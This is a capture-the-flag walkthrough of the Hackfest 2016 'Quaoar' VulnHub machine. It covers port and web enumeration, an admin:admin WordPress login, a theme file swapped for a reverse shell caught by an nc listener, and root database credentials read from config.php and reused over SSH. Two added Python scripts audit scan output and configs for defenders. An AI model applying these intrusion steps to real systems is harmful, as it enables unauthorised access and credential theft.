hackfest2016: Quaoar
Location
https://download.vulnhub.com/hackfest2016/Quaoar.ova
Description
This is a vulnerable machine created for the Hackfest 2016 CTF http://hackfest.ca/
It has level beginner for those who wish to learn more about pentesting/hacking.
Getting started
I start with an nmap scan to see which ports are open and what is running behind them.
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -p- 192.168.171.2

Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-17 16:41 CET
Nmap scan report for 192.168.171.2
Host is up (0.024s latency).
Not shown: 65526 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid:
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: STLS CAPA TOP UIDL PIPELINING RESP-CODES SASL
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-03-17T16:43:23+00:00; +59m58s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS listed OK have ENABLE Pre-login capabilities IDLE LOGINDISABLEDA0001 LITERAL+ SASL-IR ID post-login STARTTLS more IMAP4rev1
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-03-17T16:43:24+00:00; +59m58s from scanner time.
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-03-17T16:43:24+00:00; +59m58s from scanner time.
995/tcp open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: CAPA USER TOP UIDL PIPELINING RESP-CODES SASL(PLAIN)
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-03-17T16:43:24+00:00; +59m58s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.6.3)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-03-17T12:43:23-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.23 seconds
That is a lot of open ports and services: SSH, DNS, HTTP, POP3/IMAP (plain and TLS) and an SMBv1-only Samba share with message signing disabled.
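As an added example that is not part of the original writeup: a small Python parser for nmap's normal output that turns the service table and the SMB host-script lines into triage findings. The sample text below is a constructed excerpt of the scan above; the severity labels, the list of clear-text services and the rule set are my own assumptions, not nmap's.

```python
import re

# Constructed excerpt modelled on the nmap -A output above (not the full scan).
SAMPLE_NMAP_OUTPUT = """\
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: STLS CAPA TOP UIDL PIPELINING RESP-CODES SASL
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
"""

# One service line of nmap's normal output: "22/tcp  open  ssh  OpenSSH ..."
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

# Assumed rule: these protocols carry logins in clear text unless wrapped in TLS
# (nmap names the TLS-wrapped variants "ssl/imap", "ssl/pop3", so they do not match).
CLEARTEXT_SERVICES = {"pop3", "imap", "ftp", "telnet", "http"}


def parse_ports(output):
    """Return one dict per open port found in nmap's normal output."""
    ports = []
    for line in output.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "service": m.group(4),
                "version": m.group(5).strip(),
            })
    return ports


def assess(output):
    """Map the scan to (severity, finding) tuples a defender would want to triage."""
    findings = []
    for p in parse_ports(output):
        if p["service"] in CLEARTEXT_SERVICES:
            findings.append(("medium", f"{p['port']}/{p['proto']} {p['service']}: "
                                       "logins may cross the wire in clear text; require TLS"))
    # Host-script lines are not per-port, so they are matched on the whole text.
    if "message_signing: disabled" in output:
        findings.append(("high", "SMB signing disabled: sessions can be tampered with; "
                                 "set 'server signing = mandatory'"))
    if "doesn't support SMBv2" in output:
        findings.append(("high", "SMBv1-only file server: obsolete protocol; "
                                 "raise 'server min protocol' or retire the service"))
    return findings


if __name__ == "__main__":
    for severity, text in assess(SAMPLE_NMAP_OUTPUT):
        print(f"[{severity}] {text}")
```

Feed it the saved output of a real scan (`nmap -A ... -oN scan.txt`) to get a first-pass list of what to fix on the host rather than what to attack.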
Webserver
I start off with Dirb to enumerate the pages.
---- Scanning URL: http://192.168.171.2/ ----
+ http://192.168.171.2/hacking (CODE:200|SIZE:616848)
+ http://192.168.171.2/index (CODE:200|SIZE:100)
+ http://192.168.171.2/index.html (CODE:200|SIZE:100)
+ http://192.168.171.2/robots (CODE:200|SIZE:271)
+ http://192.168.171.2/robots.txt (CODE:200|SIZE:271)
==> DIRECTORY: http://192.168.171.2/upload/
==> DIRECTORY: http://192.168.171.2/wordpress/
Dirb did its work nicely and spat out a very long list, which I have cut down to the relevant entries.
The most interesting find is the WordPress site. To enumerate it I use wpscan.
WordPress Security Scanner by the WPScan Team
Version 2.9.2
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.171.2/wordpress/
[+] Started: Fri Mar 17 17:30:27 2017

[!] The WordPress 'http://192.168.171.2/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://192.168.171.2/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.171.2/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.171.2/wordpress/wp-includes/

[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers

[.....SNIP.....]

[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8730
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 3.9.16

[.....SNIP.....]

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+--------+--------+
    | Id | Login  | Name   |
    +----+--------+--------+
    | 1  | admin  | admin  |
    | 2  | wpuser | wpuser |
    +----+--------+--------+
[!] Default first WordPress username 'admin' is still used

[+] Finished: Fri Mar 17 17:31:29 2017
[+] Requests Done: 4344
[+] Memory used: 49.875 MB
[+] Elapsed time: 00:01:01
It looks like the default username is still active. I would normally try to brute force the password of the username I found, but because the default settings are still in place I try admin:admin first.
And I’m in.
To get a reverse shell I edit the ‘search.php’ file and replace its PHP code with the reverse shell from pentestmonkey. After I set up a listener I trigger the code by pressing the search button.
┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
Listening on [0.0.0.0] (family 0, port 31337)
Connection from 192.168.171.2 49617 received!
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
 14:57:19 up  2:19,  0 users,  load average: 0.18, 0.12, 0.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
Recon
$ cd /home
$ ls -lah
total 12K
drwxr-xr-x  3 root root 4.0K Oct 24 03:19 .
drwxr-xr-x 22 root root 4.0K Oct  7 00:32 ..
drwxr-xr-x  2 root root 4.0K Oct 22 12:53 wpadmin
$ cd wpadmin
$ ls lah
ls: cannot access lah: No such file or directory
$ ls -lah
total 12K
drwxr-xr-x 2 root    root    4.0K Oct 22 12:53 .
drwxr-xr-x 3 root    root    4.0K Oct 24 03:19 ..
-rw-r--r-- 1 wpadmin wpadmin   33 Oct 22 12:53 flag.txt
$ cat flag.txt
2bafe61f03117ac66a73c3c514de796e
First flag. It looks like an MD5 hash.
$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"
www-data@Quaoar:/home/wpadmin$ netstat -ant
netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
After connecting to the MySQL server it turned out the database held no useful information.
While browsing /var/www/ I stumbled upon config.php.

// config file created by LEPTON 2.2.0
define('DB_TYPE', 'mysql');
define('DB_HOST', 'localhost');
define('DB_PORT', '3306');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_NAME', 'Lepton');
define('TABLE_PREFIX', 'lep_');
It had root credentials inside, and the same password also works for the system root account over SSH.
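As an added example that is not part of the original writeup, here is a Python audit for PHP config files that covers the two weaknesses used above: the LEPTON config.php that hands the web application the database superuser's password in a world-readable file, and the WordPress install whose built-in theme editor let an admin login rewrite search.php. The LEPTON sample is a copy of the file shown above; the wp-config.php fragment is constructed. The privileged-account list, the password rule and the 14-character threshold are my own assumptions; `DISALLOW_FILE_EDIT` is the real WordPress constant that disables the dashboard file editor.

```python
import os
import re
import stat
import tempfile

# Copy of the LEPTON config.php shown above; the values are the page's own and
# serve only as sample input here.
LEPTON_SAMPLE = """<?php
// config file created by LEPTON 2.2.0
define('DB_TYPE', 'mysql');
define('DB_HOST', 'localhost');
define('DB_PORT', '3306');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_NAME', 'Lepton');
define('TABLE_PREFIX', 'lep_');
"""

# Constructed wp-config.php fragment (not from the page): a dedicated DB user,
# but the dashboard theme/plugin editor is left enabled.
WP_SAMPLE = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wp_app');
define('DB_PASSWORD', 'Kd8#qL2m!vR9tZ4pW');
define('DB_HOST', 'localhost');
"""

# Matches define('KEY', 'quoted value') as well as define('KEY', true) / 3306.
DEFINE_RE = re.compile(r"define\(\s*'([A-Za-z_]+)'\s*,\s*(?:'([^']*)'|(\w+))\s*\)")
# Assumed list of accounts an application should never connect as.
PRIVILEGED_DB_ACCOUNTS = {"root", "admin", "sa", "postgres"}


def parse_defines(text):
    """Collect define() constants from a PHP config file into a dict of strings."""
    cfg = {}
    for key, quoted, bare in DEFINE_RE.findall(text):
        cfg[key] = bare if bare else quoted
    return cfg


def audit_config(path):
    """Return findings for one PHP config file: DB account, password, editor, file mode."""
    findings = []
    with open(path, encoding="utf-8") as fh:
        cfg = parse_defines(fh.read())
    # LEPTON names the constant DB_USERNAME, WordPress names it DB_USER.
    user = cfg.get("DB_USERNAME") or cfg.get("DB_USER", "")
    if user in PRIVILEGED_DB_ACCOUNTS:
        findings.append(f"DB account is '{user}': give the app its own account granted only on "
                        f"database '{cfg.get('DB_NAME', '?')}' instead of a superuser")
    pw = cfg.get("DB_PASSWORD", "")
    if len(pw) < 14 or (user and pw.lower().startswith(user.lower())):
        findings.append("DB_PASSWORD is short or derived from the username")
    if "DB_USER" in cfg and cfg.get("DISALLOW_FILE_EDIT", "").lower() != "true":
        findings.append("WordPress file editor enabled: add define('DISALLOW_FILE_EDIT', true) "
                        "so a dashboard login cannot rewrite theme PHP")
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IROTH:
        findings.append(f"file is world-readable (mode {mode:04o}); restrict it to the web server user")
    return findings


def write_sample(text, mode=0o644):
    """Write constructed sample text to a temp file with the given mode; the caller removes it."""
    fd, path = tempfile.mkstemp(suffix=".php")
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(text)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    for sample in (LEPTON_SAMPLE, WP_SAMPLE):
        path = write_sample(sample)
        print(path)
        for finding in audit_config(path):
            print("  -", finding)
        os.remove(path)
```

The one thing a file audit cannot see is what made this box trivial once the file was read: the database password being reused as the OS root password. That has to be caught by policy, by using distinct generated secrets per service, and by not allowing root to log in over SSH at all.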
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $ssh root@192.168.171.2
root@192.168.171.2's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Fri Mar 17 15:44:22 EDT 2017

  System load:  0.17              Processes:           103
  Usage of /:   30.0% of 7.21GB   Users logged in:     0
  Memory usage: 46%               IP address for eth0:   192.168.171.2
  Swap usage:   0%                IP address for virbr0: 192.168.122.1

  Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com
root@Quaoar:~#
Now for the next flag.
root@Quaoar:~# cd /root
root@Quaoar:~# ls -lah
total 48K
drwx------  6 root root 4.0K Nov 30 19:52 .
drwxr-xr-x 22 root root 4.0K Oct  7 00:32 ..
drwx------  2 root root 4.0K Oct  7 00:30 .aptitude
-rw-------  1 root root  368 Jan 15 11:25 .bash_history
-rw-r--r--  1 root root 3.1K Apr 19  2012 .bashrc
drwx------  2 root root 4.0K Oct 15 19:23 .cache
----------  1 root root   33 Oct 22 12:44 flag.txt
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
drwx------  2 root root 4.0K Oct 26 20:50 .ssh
-rw-------  1 root root 4.7K Nov 30 19:40 .viminfo
drwxr-xr-x  8 root root 4.0K Jan 29  2015 vmware-tools-distrib
root@Quaoar:~# cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb
The description said something about a post-exploitation flag. Unfortunately I didn't find one.
Oh well. Got root, so game over. This was the easiest of the three. Time for number 2.